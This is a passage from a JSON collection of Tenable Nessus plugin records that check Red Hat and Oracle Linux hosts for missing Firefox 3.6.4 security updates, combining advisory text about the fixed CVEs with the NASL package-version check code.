script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-5017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-0182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1200\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1202\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1203\"\n );\n # http://mozilla.com/en-US/firefox/3.6.4/releasenotes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9a62ae28\"\n );\n # http://mozilla.com/en-US/firefox/3.6/releasenotes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8dbe919c\"\n );\n # http://mozilla.org/security/known-vulnerabilities/firefox35.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1de6834a\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab0bbddd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0500\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0500\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"firefox-3.6.4-8.el4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:45:09", "description": "From Red Hat Security Advisory 2010:0500 :\n\nAn updated firefox package that addresses security issues, fixes bugs,\nadds numerous enhancements, and upgrades Firefox to version 3.6.4, is\nnow available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4,\nand as such, contains multiple bug fixes and numerous enhancements.\nSpace precludes documenting these changes in this advisory. For\ndetails concerning these changes, refer to the Firefox Release Notes\nlinks in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to this updated package, which\ncontains Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.", "edition": 25, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : firefox (ELSA-2010-0500)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1203", "CVE-2010-1125", "CVE-2010-1200", "CVE-2010-1197", "CVE-2010-1121", "CVE-2010-3171", "CVE-2010-1196", "CVE-2009-5017", "CVE-2010-0182", "CVE-2010-1201", "CVE-2010-0183", "CVE-2008-5913", "CVE-2010-1028", "CVE-2010-1202", "CVE-2010-1199", "CVE-2010-1198"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:firefox", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2010-0500.NASL", "href": "https://www.tenable.com/plugins/nessus/68054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0500 and \n# Oracle Linux Security Advisory ELSA-2010-0500 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68054);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5913\", \"CVE-2009-5017\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-3171\");\n script_xref(name:\"RHSA\", value:\"2010:0500\");\n\n script_name(english:\"Oracle Linux 4 : firefox (ELSA-2010-0500)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0500 :\n\nAn updated firefox package that addresses security issues, fixes bugs,\nadds numerous enhancements, and upgrades Firefox to version 3.6.4, is\nnow available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4,\nand as such, contains multiple bug fixes and numerous enhancements.\nSpace precludes documenting these changes in this advisory. For\ndetails concerning these changes, refer to the Firefox Release Notes\nlinks in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to this updated package, which\ncontains Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-June/001509.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"firefox-3.6.4-8.0.1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:45:09", "description": "From Red Hat Security Advisory 2010:0501 :\n\nUpdated firefox packages that address several security issues, fix\nbugs, add numerous enhancements, and upgrade Firefox to version 3.6.4,\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 25 June 2010] The original packages distributed with this\nerratum had a bug which could cause unintended dependencies to be\ninstalled when upgrading. We have updated the packages to correct this\nbug.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4.\nDue to the requirements of Firefox 3.6.4, this erratum also provides a\nnumber of other updated packages, including esc, totem, and yelp.\n\nThis erratum also contains multiple bug fixes and numerous\nenhancements. Space precludes documenting these changes in this\nadvisory. For details concerning these changes, refer to the Firefox\nRelease Notes links in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.", "edition": 25, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : firefox (ELSA-2010-0501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1203", "CVE-2010-1125", "CVE-2010-1200", "CVE-2010-1197", "CVE-2010-1121", "CVE-2010-3171", "CVE-2010-1196", "CVE-2009-5017", "CVE-2010-0182", "CVE-2010-1201", "CVE-2010-0183", "CVE-2008-5913", "CVE-2010-1028", "CVE-2010-1202", "CVE-2010-1199", "CVE-2010-1198"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:xulrunner", "p-cpe:/a:oracle:linux:firefox", "p-cpe:/a:oracle:linux:yelp", "p-cpe:/a:oracle:linux:devhelp", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:totem-mozplugin", "p-cpe:/a:oracle:linux:gnome-python2-extras", "p-cpe:/a:oracle:linux:esc", "p-cpe:/a:oracle:linux:gnome-python2-gtkspell", "p-cpe:/a:oracle:linux:gnome-python2-gtkmozembed", "p-cpe:/a:oracle:linux:gnome-python2-gtkhtml2", "p-cpe:/a:oracle:linux:gnome-python2-libegg", "p-cpe:/a:oracle:linux:totem-devel", "p-cpe:/a:oracle:linux:totem", "p-cpe:/a:oracle:linux:devhelp-devel", "p-cpe:/a:oracle:linux:xulrunner-devel"], "id": "ORACLELINUX_ELSA-2010-0501.NASL", "href": "https://www.tenable.com/plugins/nessus/68055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0501 and \n# Oracle Linux Security Advisory ELSA-2010-0501 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68055);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5913\", \"CVE-2009-5017\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-3171\");\n script_xref(name:\"RHSA\", value:\"2010:0501\");\n\n script_name(english:\"Oracle Linux 5 : firefox (ELSA-2010-0501)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0501 :\n\nUpdated firefox packages that address several security issues, fix\nbugs, add numerous enhancements, and upgrade Firefox to version 3.6.4,\nare now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 25 June 2010] The original packages distributed with this\nerratum had a bug which could cause unintended dependencies to be\ninstalled when upgrading. We have updated the packages to correct this\nbug.\n\nMozilla Firefox is an open source web browser.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2010-1121, CVE-2010-1200, CVE-2010-1202,\nCVE-2010-1203)\n\nA flaw was found in the way browser plug-ins interact. It was possible\nfor a plug-in to reference the freed memory from a different plug-in,\nresulting in the execution of arbitrary code with the privileges of\nthe user running Firefox. (CVE-2010-1198)\n\nSeveral integer overflow flaws were found in the processing of\nmalformed web content. A web page containing malicious content could\ncause Firefox to crash or, potentially, execute arbitrary code with\nthe privileges of the user running Firefox. (CVE-2010-1196,\nCVE-2010-1199)\n\nA focus stealing flaw was found in the way Firefox handled focus\nchanges. A malicious website could use this flaw to steal sensitive\ndata from a user, such as usernames and passwords. (CVE-2010-1125)\n\nA flaw was found in the way Firefox handled the 'Content-Disposition:\nattachment' HTTP header when the 'Content-Type: multipart' HTTP header\nwas also present. A website that allows arbitrary uploads and relies\non the 'Content-Disposition: attachment' HTTP header to prevent\ncontent from being displayed inline, could be used by an attacker to\nserve malicious content to users. (CVE-2010-1197)\n\nA flaw was found in the Firefox Math.random() function. This function\ncould be used to identify a browsing session and track a user across\ndifferent websites. (CVE-2008-5913)\n\nA flaw was found in the Firefox XML document loading security checks.\nCertain security checks were not being called when an XML document was\nloaded. This could possibly be leveraged later by an attacker to load\ncertain resources that violate the security policies of the browser or\nits add-ons. Note that this issue cannot be exploited by only loading\nan XML document. (CVE-2010-0182)\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 3.6.4. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nThis erratum upgrades Firefox from version 3.0.19 to version 3.6.4.\nDue to the requirements of Firefox 3.6.4, this erratum also provides a\nnumber of other updated packages, including esc, totem, and yelp.\n\nThis erratum also contains multiple bug fixes and numerous\nenhancements. Space precludes documenting these changes in this\nadvisory. For details concerning these changes, refer to the Firefox\nRelease Notes links in the References section of this erratum.\n\nImportant: Firefox 3.6.4 is not completely backwards-compatible with\nall Mozilla Add-ons and Firefox plug-ins that worked with Firefox\n3.0.19. Firefox 3.6 checks compatibility on first-launch, and,\ndepending on the individual configuration and the installed Add-ons\nand plug-ins, may disable said Add-ons and plug-ins, or attempt to\ncheck for updates and upgrade them. Add-ons and plug-ins may have to\nbe manually updated.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 3.6.4. After installing the update, Firefox\nmust be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-June/001510.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:devhelp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:devhelp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:esc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnome-python2-gtkhtml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnome-python2-gtkmozembed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnome-python2-gtkspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gnome-python2-libegg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:totem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:totem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:totem-mozplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:yelp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) 